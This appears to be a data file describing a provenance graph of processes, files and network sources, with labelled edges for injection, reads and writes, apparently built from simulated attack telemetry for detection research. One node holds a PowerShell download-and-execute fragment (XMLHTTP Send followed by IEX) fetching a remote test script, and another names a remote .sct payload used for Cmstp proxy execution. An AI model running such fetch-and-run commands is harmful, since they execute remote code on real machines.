11
MP*-fltmc.exe
TP-360TS_Setup_Mini_WW.OG.CPI202304_6.6.0.1054.exe
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX
MP-jsIXhU
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct
SF-c:\windows\system32\wbem\mofcomp.exe
MP-Xenos.exe 
MP*-T1027.exe
TP*-damianoh68951.exe
MF-C:\Users\admin\AppData\Local\Temp\f8ab93332536f27e4c463bde920795e59a08898ff648f679ca15c624f39b6dc8
MP*-o0575127.exe
21
0 1 IJ
2 0 RF
2 1 RF
0 3 FR
1 3 UK
0 4 ST
0 5 WR
0 6 UK
2 7 RF
4 7 RF
7 5 RD
8 2 ST
4 8 RF
8 5 WR
7 8 IJ
7 9 WR
8 9 UK
2 10 RF
4 10 RF
10 5 WR
7 10 UK

